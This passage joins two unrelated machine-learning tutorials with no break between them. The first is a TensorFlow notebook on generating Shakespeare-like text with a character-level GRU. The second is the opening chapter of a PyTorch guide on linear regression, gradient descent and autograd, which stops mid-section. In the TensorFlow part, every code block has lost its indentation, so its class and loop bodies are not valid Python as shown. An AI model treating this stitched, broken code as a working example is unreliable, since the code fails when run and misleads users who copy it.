# See the License for the specific language governing permissions and
# limitations under the License.
```
# Text generation with an RNN
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/text/text_generation"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/text/text_generation.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
This tutorial demonstrates how to generate text using a character-based RNN. You will work with a dataset of Shakespeare's writing from Andrej Karpathy's [The Unreasonable Effectiveness of Recurrent Neural Networks](http://karpathy.github.io/2015/05/21/rnn-effectiveness/). Given a sequence of characters from this data ("Shakespear"), train a model to predict the next character in the sequence ("e"). Longer sequences of text can be generated by calling the model repeatedly.
Note: Enable GPU acceleration to execute this notebook faster. In Colab: *Runtime > Change runtime type > Hardware accelerator > GPU*.
This tutorial includes runnable code implemented using [tf.keras](https://www.tensorflow.org/programmers_guide/keras) and [eager execution](https://www.tensorflow.org/programmers_guide/eager). The following is sample output when the model in this tutorial trained for 30 epochs, and started with the prompt "Q":
<pre>
QUEENE:
I had thought thou hadst a Roman; for the oracle,
Thus by All bids the man against the word,
Which are so weak of care, by old care done;
Your children were in your holy love,
And the precipitation through the bleeding throne.
BISHOP OF ELY:
Marry, and will, my lord, to weep in such a one were prettiest;
Yet now I was adopted heir
Of the world's lamentable day,
To watch the next way with his father with his face?
ESCALUS:
The cause why then we are all resolved more sons.
VOLUMNIA:
O, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, it is no sin it should be dead,
And love and pale as any will to that word.
QUEEN ELIZABETH:
But how long have I heard the soul for this world,
And show his hands of life be proved to stand.
PETRUCHIO:
I say he look'd on, if I must be content
To stay him from the fatal of our country's bliss.
His lordship pluck'd from this sentence then for prey,
And then let us twain, being the moon,
were she such a case as fills m
</pre>
While some of the sentences are grammatical, most do not make sense. The model has not learned the meaning of words, but consider:
* The model is character-based. When training started, the model did not know how to spell an English word, or that words were even a unit of text.
* The structure of the output resembles a play—blocks of text generally begin with a speaker name, in all capital letters similar to the dataset.
* As demonstrated below, the model is trained on small batches of text (100 characters each), and is still able to generate a longer sequence of text with coherent structure.
## Setup
### Import TensorFlow and other libraries
```
import tensorflow as tf
from tensorflow.keras.layers.experimental import preprocessing
import numpy as np
import os
import time
```
### Download the Shakespeare dataset
Change the following line to run this code on your own data.
```
path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')
```
### Read the data
First, look in the text:
```
# Read, then decode for py2 compat.
text = open(path_to_file, 'rb').read().decode(encoding='utf-8')
# length of text is the number of characters in it
print('Length of text: {} characters'.format(len(text)))
# Take a look at the first 250 characters in text
print(text[:250])
# The unique characters in the file
vocab = sorted(set(text))
print('{} unique characters'.format(len(vocab)))
```
## Process the text
### Vectorize the text
Before training, you need to convert the strings to a numerical representation.
The `preprocessing.StringLookup` layer can convert each character into a numeric ID. It just needs the text to be split into tokens first.
```
example_texts = ['abcdefg', 'xyz']
chars = tf.strings.unicode_split(example_texts, input_encoding='UTF-8')
chars
```
Now create the `preprocessing.StringLookup` layer:
```
ids_from_chars = preprocessing.StringLookup(
vocabulary=list(vocab))
```
It converts from tokens to character IDs, padding with `0`:
```
ids = ids_from_chars(chars)
ids
```
Since the goal of this tutorial is to generate text, it will also be important to invert this representation and recover human-readable strings from it. For this you can use `preprocessing.StringLookup(..., invert=True)`.
Note: Here instead of passing the original vocabulary generated with `sorted(set(text))` use the `get_vocabulary()` method of the `preprocessing.StringLookup` layer so that the padding and `[UNK]` tokens are set the same way.
```
chars_from_ids = tf.keras.layers.experimental.preprocessing.StringLookup(
vocabulary=ids_from_chars.get_vocabulary(), invert=True)
```
This layer recovers the characters from the vectors of IDs, and returns them as a `tf.RaggedTensor` of characters:
```
chars = chars_from_ids(ids)
chars
```
You can use `tf.strings.reduce_join` to join the characters back into strings.
```
tf.strings.reduce_join(chars, axis=-1).numpy()
def text_from_ids(ids):
return tf.strings.reduce_join(chars_from_ids(ids), axis=-1)
```
### The prediction task
Given a character, or a sequence of characters, what is the most probable next character? This is the task you're training the model to perform. The input to the model will be a sequence of characters, and you train the model to predict the output—the following character at each time step.
Since RNNs maintain an internal state that depends on the previously seen elements, given all the characters computed until this moment, what is the next character?
### Create training examples and targets
Next divide the text into example sequences. Each input sequence will contain `seq_length` characters from the text.
For each input sequence, the corresponding targets contain the same length of text, except shifted one character to the right.
So break the text into chunks of `seq_length+1`. For example, say `seq_length` is 4 and our text is "Hello". The input sequence would be "Hell", and the target sequence "ello".
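The "Hello" example in plain Python slicing (a toy illustration, independent of the `tf.data` pipeline):

```python
seq = "Hello"  # one chunk of length seq_length + 1, with seq_length = 4
input_text, target_text = seq[:-1], seq[1:]
print(input_text, target_text)  # Hell ello
```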
To do this first use the `tf.data.Dataset.from_tensor_slices` function to convert the text vector into a stream of character indices.
```
all_ids = ids_from_chars(tf.strings.unicode_split(text, 'UTF-8'))
all_ids
ids_dataset = tf.data.Dataset.from_tensor_slices(all_ids)
for ids in ids_dataset.take(10):
print(chars_from_ids(ids).numpy().decode('utf-8'))
seq_length = 100
examples_per_epoch = len(text)//(seq_length+1)
```
The `batch` method lets you easily convert these individual characters to sequences of the desired size.
```
sequences = ids_dataset.batch(seq_length+1, drop_remainder=True)
for seq in sequences.take(1):
print(chars_from_ids(seq))
```
It's easier to see what this is doing if you join the tokens back into strings:
```
for seq in sequences.take(5):
print(text_from_ids(seq).numpy())
```
For training you'll need a dataset of `(input, label)` pairs, where `input` and `label` are sequences. At each time step the input is the current character and the label is the next character.
Here's a function that takes a sequence as input, duplicates, and shifts it to align the input and label for each timestep:
```
def split_input_target(sequence):
input_text = sequence[:-1]
target_text = sequence[1:]
return input_text, target_text
split_input_target(list("Tensorflow"))
dataset = sequences.map(split_input_target)
for input_example, target_example in dataset.take(1):
print("Input :", text_from_ids(input_example).numpy())
print("Target:", text_from_ids(target_example).numpy())
```
### Create training batches
You used `tf.data` to split the text into manageable sequences. But before feeding this data into the model, you need to shuffle the data and pack it into batches.
```
# Batch size
BATCH_SIZE = 64
# Buffer size to shuffle the dataset
# (TF data is designed to work with possibly infinite sequences,
# so it doesn't attempt to shuffle the entire sequence in memory. Instead,
# it maintains a buffer in which it shuffles elements).
BUFFER_SIZE = 10000
dataset = (
dataset
.shuffle(BUFFER_SIZE)
.batch(BATCH_SIZE, drop_remainder=True)
.prefetch(tf.data.experimental.AUTOTUNE))
dataset
```
## Build The Model
This section defines the model as a `keras.Model` subclass (For details see [Making new Layers and Models via subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models)).
This model has three layers:
* `tf.keras.layers.Embedding`: The input layer. A trainable lookup table that will map each character-ID to a vector with `embedding_dim` dimensions;
* `tf.keras.layers.GRU`: A type of RNN with size `units=rnn_units` (You can also use an LSTM layer here.)
* `tf.keras.layers.Dense`: The output layer, with `vocab_size` outputs. It outputs one logit for each character in the vocabulary. These are the log-likelihoods of each character according to the model.
```
# Length of the vocabulary in chars
vocab_size = len(vocab)
# The embedding dimension
embedding_dim = 256
# Number of RNN units
rnn_units = 1024
class MyModel(tf.keras.Model):
def __init__(self, vocab_size, embedding_dim, rnn_units):
super().__init__(self)
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(rnn_units,
return_sequences=True,
return_state=True)
self.dense = tf.keras.layers.Dense(vocab_size)
def call(self, inputs, states=None, return_state=False, training=False):
x = inputs
x = self.embedding(x, training=training)
if states is None:
states = self.gru.get_initial_state(x)
x, states = self.gru(x, initial_state=states, training=training)
x = self.dense(x, training=training)
if return_state:
return x, states
else:
return x
model = MyModel(
# Be sure the vocabulary size matches the `StringLookup` layers.
vocab_size=len(ids_from_chars.get_vocabulary()),
embedding_dim=embedding_dim,
rnn_units=rnn_units)
```
For each character the model looks up the embedding, runs the GRU one timestep with the embedding as input, and applies the dense layer to generate logits predicting the log-likelihood of the next character:

Note: For training you could use a `keras.Sequential` model here. To generate text later you'll need to manage the RNN's internal state. It's simpler to include the state input and output options upfront than to rearrange the model architecture later. For more details see the [Keras RNN guide](https://www.tensorflow.org/guide/keras/rnn#rnn_state_reuse).
## Try the model
Now run the model to see that it behaves as expected.
First check the shape of the output:
```
for input_example_batch, target_example_batch in dataset.take(1):
example_batch_predictions = model(input_example_batch)
print(example_batch_predictions.shape, "# (batch_size, sequence_length, vocab_size)")
```
In the above example the sequence length of the input is `100` but the model can be run on inputs of any length:
```
model.summary()
```
To get actual predictions from the model you need to sample from the output distribution, to get actual character indices. This distribution is defined by the logits over the character vocabulary.
Note: It is important to _sample_ from this distribution as taking the _argmax_ of the distribution can easily get the model stuck in a loop.
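To see why, here is a minimal NumPy sketch (not the tutorial's code): with a fixed distribution, argmax always picks the same index, while sampling from the same distribution varies:

```python
import numpy as np

rng = np.random.default_rng(0)
logits = np.array([2.0, 1.0, 0.5])             # fixed logits for one timestep
probs = np.exp(logits) / np.exp(logits).sum()  # softmax

# Greedy decoding: identical pick every time -> easy to loop on repeated text
greedy = [int(np.argmax(logits)) for _ in range(5)]

# Sampling: indices drawn in proportion to the probabilities -> varied output
sampled = [int(rng.choice(len(probs), p=probs)) for _ in range(5)]

print(greedy)  # [0, 0, 0, 0, 0]
print(sampled)
```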
Try it for the first example in the batch:
```
sampled_indices = tf.random.categorical(example_batch_predictions[0], num_samples=1)
sampled_indices = tf.squeeze(sampled_indices,axis=-1).numpy()
```
This gives us, at each timestep, a prediction of the next character index:
```
sampled_indices
```
Decode these to see the text predicted by this untrained model:
```
print("Input:\n", text_from_ids(input_example_batch[0]).numpy())
print()
print("Next Char Predictions:\n", text_from_ids(sampled_indices).numpy())
```
## Train the model
At this point the problem can be treated as a standard classification problem. Given the previous RNN state, and the input this time step, predict the class of the next character.
### Attach an optimizer, and a loss function
The standard `tf.keras.losses.sparse_categorical_crossentropy` loss function works in this case because it is applied across the last dimension of the predictions.
Because your model returns logits, you need to set the `from_logits` flag.
```
loss = tf.losses.SparseCategoricalCrossentropy(from_logits=True)
example_batch_loss = loss(target_example_batch, example_batch_predictions)
mean_loss = example_batch_loss.numpy().mean()
print("Prediction shape: ", example_batch_predictions.shape, " # (batch_size, sequence_length, vocab_size)")
print("Mean loss: ", mean_loss)
```
A newly initialized model shouldn't be too sure of itself; the output logits should all have similar magnitudes. To confirm this you can check that the exponential of the mean loss is approximately equal to the vocabulary size. A much higher loss means the model is sure of its wrong answers, and is badly initialized:
```
tf.exp(mean_loss).numpy()
```
Configure the training procedure using the `tf.keras.Model.compile` method. Use `tf.keras.optimizers.Adam` with default arguments and the loss function.
```
model.compile(optimizer='adam', loss=loss)
```
### Configure checkpoints
Use a `tf.keras.callbacks.ModelCheckpoint` to ensure that checkpoints are saved during training:
```
# Directory where the checkpoints will be saved
checkpoint_dir = './training_checkpoints'
# Name of the checkpoint files
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt_{epoch}")
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_prefix,
save_weights_only=True)
```
### Execute the training
To keep training time reasonable, use 20 epochs to train the model. In Colab, set the runtime to GPU for faster training.
```
EPOCHS = 20
history = model.fit(dataset, epochs=EPOCHS, callbacks=[checkpoint_callback])
```
## Generate text
The simplest way to generate text with this model is to run it in a loop, and keep track of the model's internal state as you execute it.

Each time you call the model you pass in some text and an internal state. The model returns a prediction for the next character and its new state. Pass the prediction and state back in to continue generating text.
The following makes a single step prediction:
```
class OneStep(tf.keras.Model):
def __init__(self, model, chars_from_ids, ids_from_chars, temperature=1.0):
super().__init__()
self.temperature=temperature
self.model = model
self.chars_from_ids = chars_from_ids
self.ids_from_chars = ids_from_chars
# Create a mask to prevent "" or "[UNK]" from being generated.
skip_ids = self.ids_from_chars(['','[UNK]'])[:, None]
sparse_mask = tf.SparseTensor(
# Put a -inf at each bad index.
values=[-float('inf')]*len(skip_ids),
indices = skip_ids,
# Match the shape to the vocabulary
dense_shape=[len(ids_from_chars.get_vocabulary())])
self.prediction_mask = tf.sparse.to_dense(sparse_mask)
@tf.function
def generate_one_step(self, inputs, states=None):
# Convert strings to token IDs.
input_chars = tf.strings.unicode_split(inputs, 'UTF-8')
input_ids = self.ids_from_chars(input_chars).to_tensor()
# Run the model.
# predicted_logits.shape is [batch, char, next_char_logits]
predicted_logits, states = self.model(inputs=input_ids, states=states,
return_state=True)
# Only use the last prediction.
predicted_logits = predicted_logits[:, -1, :]
predicted_logits = predicted_logits/self.temperature
# Apply the prediction mask: prevent "" or "[UNK]" from being generated.
predicted_logits = predicted_logits + self.prediction_mask
# Sample the output logits to generate token IDs.
predicted_ids = tf.random.categorical(predicted_logits, num_samples=1)
predicted_ids = tf.squeeze(predicted_ids, axis=-1)
# Convert from token ids to characters
predicted_chars = self.chars_from_ids(predicted_ids)
# Return the characters and model state.
return predicted_chars, states
one_step_model = OneStep(model, chars_from_ids, ids_from_chars)
```
Run it in a loop to generate some text. Looking at the generated text, you'll see the model knows when to capitalize, makes paragraphs, and imitates a Shakespeare-like vocabulary. With the small number of training epochs, it has not yet learned to form coherent sentences.
```
start = time.time()
states = None
next_char = tf.constant(['ROMEO:'])
result = [next_char]
for n in range(1000):
next_char, states = one_step_model.generate_one_step(next_char, states=states)
result.append(next_char)
result = tf.strings.join(result)
end = time.time()
print(result[0].numpy().decode('utf-8'), '\n\n' + '_'*80)
print(f"\nRun time: {end - start}")
```
The easiest thing you can do to improve the results is to train it for longer (try `EPOCHS = 30`).
You can also experiment with a different start string, try adding another RNN layer to improve the model's accuracy, or adjust the temperature parameter to generate more or less random predictions.
If you want the model to generate text *faster* the easiest thing you can do is batch the text generation. In the example below the model generates 5 outputs in about the same time it took to generate 1 above.
```
start = time.time()
states = None
next_char = tf.constant(['ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:'])
result = [next_char]
for n in range(1000):
next_char, states = one_step_model.generate_one_step(next_char, states=states)
result.append(next_char)
result = tf.strings.join(result)
end = time.time()
print(result, '\n\n' + '_'*80)
print(f"\nRun time: {end - start}")
```
## Export the generator
This single-step model can easily be [saved and restored](https://www.tensorflow.org/guide/saved_model), allowing you to use it anywhere a `tf.saved_model` is accepted.
```
tf.saved_model.save(one_step_model, 'one_step')
one_step_reloaded = tf.saved_model.load('one_step')
states = None
next_char = tf.constant(['ROMEO:'])
result = [next_char]
for n in range(100):
next_char, states = one_step_reloaded.generate_one_step(next_char, states=states)
result.append(next_char)
print(tf.strings.join(result)[0].numpy().decode("utf-8"))
```
## Advanced: Customized Training
The above training procedure is simple, but does not give you much control.
It uses teacher forcing, which prevents bad predictions from being fed back to the model, so the model never learns to recover from mistakes.
So now that you've seen how to run the model manually next you'll implement the training loop. This gives a starting point if, for example, you want to implement _curriculum learning_ to help stabilize the model's open-loop output.
The most important part of a custom training loop is the train step function.
Use `tf.GradientTape` to track the gradients. You can learn more about this approach by reading the [eager execution guide](https://www.tensorflow.org/guide/eager).
The basic procedure is:
1. Execute the model and calculate the loss under a `tf.GradientTape`.
2. Calculate the updates and apply them to the model using the optimizer.
```
class CustomTraining(MyModel):
@tf.function
def train_step(self, inputs):
inputs, labels = inputs
with tf.GradientTape() as tape:
predictions = self(inputs, training=True)
loss = self.loss(labels, predictions)
grads = tape.gradient(loss, model.trainable_variables)
self.optimizer.apply_gradients(zip(grads, model.trainable_variables))
return {'loss': loss}
```
The above implementation of the `train_step` method follows [Keras' `train_step` conventions](https://www.tensorflow.org/guide/keras/customizing_what_happens_in_fit). This is optional, but it allows you to change the behavior of the train step and still use keras' `Model.compile` and `Model.fit` methods.
```
model = CustomTraining(
vocab_size=len(ids_from_chars.get_vocabulary()),
embedding_dim=embedding_dim,
rnn_units=rnn_units)
model.compile(optimizer = tf.keras.optimizers.Adam(),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))
model.fit(dataset, epochs=1)
```
Or if you need more control, you can write your own complete custom training loop:
```
EPOCHS = 10
mean = tf.metrics.Mean()
for epoch in range(EPOCHS):
start = time.time()
mean.reset_states()
for (batch_n, (inp, target)) in enumerate(dataset):
logs = model.train_step([inp, target])
mean.update_state(logs['loss'])
if batch_n % 50 == 0:
template = 'Epoch {} Batch {} Loss {}'
print(template.format(epoch + 1, batch_n, logs['loss']))
# saving (checkpoint) the model every 5 epochs
if (epoch + 1) % 5 == 0:
model.save_weights(checkpoint_prefix.format(epoch=epoch))
print()
print('Epoch {} Loss: {:.4f}'.format(epoch + 1, mean.result().numpy()))
print('Time taken for 1 epoch {} sec'.format(time.time() - start))
print("_"*80)
model.save_weights(checkpoint_prefix.format(epoch=epoch))
```
# Deep Learning with PyTorch Step-by-Step: A Beginner's Guide
# Chapter 1
```
try:
import google.colab
import requests
url = 'https://raw.githubusercontent.com/dvgodoy/PyTorchStepByStep/master/config.py'
r = requests.get(url, allow_redirects=True)
open('config.py', 'wb').write(r.content)
except ModuleNotFoundError:
pass
from config import *
config_chapter1()
# This is needed to render the plots in this chapter
from plots.chapter1 import *
import numpy as np
from sklearn.linear_model import LinearRegression
import torch
import torch.optim as optim
import torch.nn as nn
from torchviz import make_dot
```
# A Simple Regression Problem
$$
\Large y = b + w x + \epsilon
$$
## Data Generation
### Synthetic Data Generation
```
true_b = 1
true_w = 2
N = 100
# Data Generation
np.random.seed(42)
x = np.random.rand(N, 1)
epsilon = (.1 * np.random.randn(N, 1))
y = true_b + true_w * x + epsilon
```
### Cell 1.1
```
# Shuffles the indices
idx = np.arange(N)
np.random.shuffle(idx)
# Uses first 80 random indices for train
train_idx = idx[:int(N*.8)]
# Uses the remaining indices for validation
val_idx = idx[int(N*.8):]
# Generates train and validation sets
x_train, y_train = x[train_idx], y[train_idx]
x_val, y_val = x[val_idx], y[val_idx]
figure1(x_train, y_train, x_val, y_val)
```
# Gradient Descent
## Step 0: Random Initialization
```
# Step 0 - Initializes parameters "b" and "w" randomly
np.random.seed(42)
b = np.random.randn(1)
w = np.random.randn(1)
print(b, w)
```
## Step 1: Compute Model's Predictions
```
# Step 1 - Computes our model's predicted output - forward pass
yhat = b + w * x_train
```
## Step 2: Compute the Loss
```
# Step 2 - Computing the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
print(loss)
```
## Step 3: Compute the Gradients
```
# Step 3 - Computes gradients for both "b" and "w" parameters
b_grad = 2 * error.mean()
w_grad = 2 * (x_train * error).mean()
print(b_grad, w_grad)
```
## Step 4: Update the Parameters
```
# Sets learning rate - this is "eta" ~ the "n" like Greek letter
lr = 0.1
print(b, w)
# Step 4 - Updates parameters using gradients and
# the learning rate
b = b - lr * b_grad
w = w - lr * w_grad
print(b, w)
```
## Step 5: Rinse and Repeat!
```
# Go back to Step 1, run the cells again, and observe how your parameters b and w change
```
# Linear Regression in Numpy
### Cell 1.2
```
# Step 0 - Initializes parameters "b" and "w" randomly
np.random.seed(42)
b = np.random.randn(1)
w = np.random.randn(1)
print(b, w)
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
    # Step 1 - Computes model's predicted output - forward pass
    yhat = b + w * x_train
    # Step 2 - Computes the loss
    # We are using ALL data points, so this is BATCH gradient
    # descent. How wrong is our model? That's the error!
    error = (yhat - y_train)
    # It is a regression, so it computes mean squared error (MSE)
    loss = (error ** 2).mean()
    # Step 3 - Computes gradients for both "b" and "w" parameters
    b_grad = 2 * error.mean()
    w_grad = 2 * (x_train * error).mean()
    # Step 4 - Updates parameters using gradients and
    # the learning rate
    b = b - lr * b_grad
    w = w - lr * w_grad

print(b, w)
# Sanity Check: do we get the same results as our
# gradient descent?
linr = LinearRegression()
linr.fit(x_train, y_train)
print(linr.intercept_, linr.coef_[0])
fig = figure3(x_train, y_train)
```
# PyTorch
## Tensor
```
scalar = torch.tensor(3.14159)
vector = torch.tensor([1, 2, 3])
matrix = torch.ones((2, 3), dtype=torch.float)
tensor = torch.randn((2, 3, 4), dtype=torch.float)
print(scalar)
print(vector)
print(matrix)
print(tensor)
print(tensor.size(), tensor.shape)
print(scalar.size(), scalar.shape)
# We get a tensor with a different shape but it still is
# the SAME tensor
same_matrix = matrix.view(1, 6)
# If we change one of its elements...
same_matrix[0, 1] = 2.
# It changes both variables: matrix and same_matrix
print(matrix)
print(same_matrix)
# We can use "new_tensor" method to REALLY copy it into a new one
different_matrix = matrix.new_tensor(matrix.view(1, 6))
# Now, if we change one of its elements...
different_matrix[0, 1] = 3.
# The original tensor (matrix) is left untouched!
# But we get a "warning" from PyTorch telling us
# to use "clone()" instead!
print(matrix)
print(different_matrix)
# Let's follow PyTorch's suggestion and use the "clone" method
another_matrix = matrix.view(1, 6).clone().detach()
# Again, if we change one of its elements...
another_matrix[0, 1] = 4.
# The original tensor (matrix) is left untouched!
print(matrix)
print(another_matrix)
```
## Loading Data, Devices and CUDA
```
x_train_tensor = torch.as_tensor(x_train)
x_train.dtype, x_train_tensor.dtype
float_tensor = x_train_tensor.float()
float_tensor.dtype
dummy_array = np.array([1, 2, 3])
dummy_tensor = torch.as_tensor(dummy_array)
# Modifies the numpy array
dummy_array[1] = 0
# Tensor gets modified too...
dummy_tensor
dummy_tensor.numpy()
```
### Defining your device
```
device = 'cuda' if torch.cuda.is_available() else 'cpu'
n_cudas = torch.cuda.device_count()
for i in range(n_cudas):
    print(torch.cuda.get_device_name(i))
gpu_tensor = torch.as_tensor(x_train).to(device)
gpu_tensor[0]
```
### Cell 1.3
```
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Our data was in Numpy arrays, but we need to transform them
# into PyTorch's Tensors and then we send them to the
# chosen device
x_train_tensor = torch.as_tensor(x_train).float().to(device)
y_train_tensor = torch.as_tensor(y_train).float().to(device)
# Here we can see the difference - notice that .type() is more
# useful since it also tells us WHERE the tensor is (device)
print(type(x_train), type(x_train_tensor), x_train_tensor.type())
back_to_numpy = x_train_tensor.numpy()
back_to_numpy = x_train_tensor.cpu().numpy()
```
## Creating Parameters
```
# FIRST
# Initializes parameters "b" and "w" randomly, ALMOST as we
# did in Numpy since we want to apply gradient descent on
# these parameters we need to set REQUIRES_GRAD = TRUE
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, dtype=torch.float)
w = torch.randn(1, requires_grad=True, dtype=torch.float)
print(b, w)
# SECOND
# But what if we want to run it on a GPU? We could just
# send them to device, right?
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)
w = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)
print(b, w)
# Sorry, but NO! The to(device) "shadows" the gradient...
# THIRD
# We can either create regular tensors and send them to
# the device (as we did with our data)
torch.manual_seed(42)
b = torch.randn(1, dtype=torch.float).to(device)
w = torch.randn(1, dtype=torch.float).to(device)
# and THEN set them as requiring gradients...
b.requires_grad_()
w.requires_grad_()
print(b, w)
```
### Cell 1.4
```
# FINAL
# We can specify the device at the moment of creation
# RECOMMENDED!
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
print(b, w)
```
# Autograd
## backward
### Cell 1.5
```
# Step 1 - Computes our model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient descent
# How wrong is our model? That's the error!
error = (yhat - y_train_tensor)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# Step 3 - Computes gradients for both "b" and "w" parameters
# No more manual computation of gradients!
# b_grad = 2 * error.mean()
# w_grad = 2 * (x_tensor * error).mean()
loss.backward()
print(error.requires_grad, yhat.requires_grad, \
b.requires_grad, w.requires_grad)
print(y_train_tensor.requires_grad, x_train_tensor.requires_grad)
```
## grad
```
print(b.grad, w.grad)
# Just run the two cells above one more time
```
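Running the two cells above again makes the printed gradients grow, because PyTorch accumulates gradients across `backward()` calls until they are zeroed. A minimal NumPy sketch (toy values, using the analytic MSE gradient from Step 3 rather than autograd) of what "accumulation" means — computing the same gradient twice and summing doubles the stored value:

```python
import numpy as np

# Tiny fixed dataset and parameters (hypothetical values for illustration)
x = np.array([0.0, 1.0])
y = np.array([1.0, 3.0])
b, w = 0.0, 0.0

def b_gradient(b, w, x, y):
    # Analytic MSE gradient w.r.t. "b" (same formula as in Step 3)
    error = (b + w * x) - y
    return 2 * error.mean()

# "Accumulating" the gradient, as PyTorch does when zero_ is not called
accumulated = 0.0
accumulated += b_gradient(b, w, x, y)  # first backward()
accumulated += b_gradient(b, w, x, y)  # second backward()
print(accumulated)  # twice the single-pass gradient
```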
## zero_
```
# This code will be placed *after* Step 4
# (updating the parameters)
b.grad.zero_(), w.grad.zero_()
```
## Updating Parameters
### Cell 1.6
```
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
    # Step 1 - Computes model's predicted output - forward pass
    yhat = b + w * x_train_tensor
    # Step 2 - Computes the loss
    # We are using ALL data points, so this is BATCH gradient
    # descent. How wrong is our model? That's the error!
    error = (yhat - y_train_tensor)
    # It is a regression, so it computes mean squared error (MSE)
    loss = (error ** 2).mean()
    # Step 3 - Computes gradients for both "b" and "w" parameters
    # No more manual computation of gradients!
    # b_grad = 2 * error.mean()
    # w_grad = 2 * (x_tensor * error).mean()
    # We just tell PyTorch to work its way BACKWARDS
    # from the specified loss!
    loss.backward()
    # Step 4 - Updates parameters using gradients and
    # the learning rate. But not so fast...
    # FIRST ATTEMPT - just using the same code as before
    # AttributeError: 'NoneType' object has no attribute 'zero_'
    # b = b - lr * b.grad
    # w = w - lr * w.grad
    # print(b)
    # SECOND ATTEMPT - using in-place Python assignment
    # RuntimeError: a leaf Variable that requires grad
    # has been used in an in-place operation.
    # b -= lr * b.grad
    # w -= lr * w.grad
    # THIRD ATTEMPT - NO_GRAD for the win!
    # We need to use NO_GRAD to keep the update out of
    # the gradient computation. Why is that? It boils
    # down to the DYNAMIC GRAPH that PyTorch uses...
    with torch.no_grad():
        b -= lr * b.grad
        w -= lr * w.grad
    # PyTorch is "clingy" to its computed gradients, we
    # need to tell it to let it go...
    b.grad.zero_()
    w.grad.zero_()

print(b, w)
```
## no_grad
```
# This is what we used in the THIRD ATTEMPT...
```
# Dynamic Computation Graph
```
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
# Step 1 - Computes our model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train_tensor)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# We can try plotting the graph for any python variable:
# yhat, error, loss...
make_dot(yhat)
b_nograd = torch.randn(1, requires_grad=False, \
                       dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
yhat = b_nograd + w * x_train_tensor
make_dot(yhat)
b = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
yhat = b + w * x_train_tensor
error = yhat - y_train_tensor
loss = (error ** 2).mean()
# this makes no sense!!
if loss > 0:
    yhat2 = w * x_train_tensor
    error2 = yhat2 - y_train_tensor
    # neither does this :-)
    loss += error2.mean()
make_dot(loss)
```
# Optimizer
## step / zero_grad
```
# Defines a SGD optimizer to update the parameters
optimizer = optim.SGD([b, w], lr=lr)
```
### Cell 1.7
```
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
# Defines a SGD optimizer to update the parameters
optimizer = optim.SGD([b, w], lr=lr)
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
    # Step 1 - Computes model's predicted output - forward pass
    yhat = b + w * x_train_tensor
    # Step 2 - Computes the loss
    # We are using ALL data points, so this is BATCH gradient
    # descent. How wrong is our model? That's the error!
    error = (yhat - y_train_tensor)
    # It is a regression, so it computes mean squared error (MSE)
    loss = (error ** 2).mean()
    # Step 3 - Computes gradients for both "b" and "w" parameters
    loss.backward()
    # Step 4 - Updates parameters using gradients and
    # the learning rate. No more manual update!
    # with torch.no_grad():
    #     b -= lr * b.grad
    #     w -= lr * w.grad
    optimizer.step()
    # No more telling Pytorch to let gradients go!
    # b.grad.zero_()
    # w.grad.zero_()
    optimizer.zero_grad()

print(b, w)
```
# Loss
```
# Defines a MSE loss function
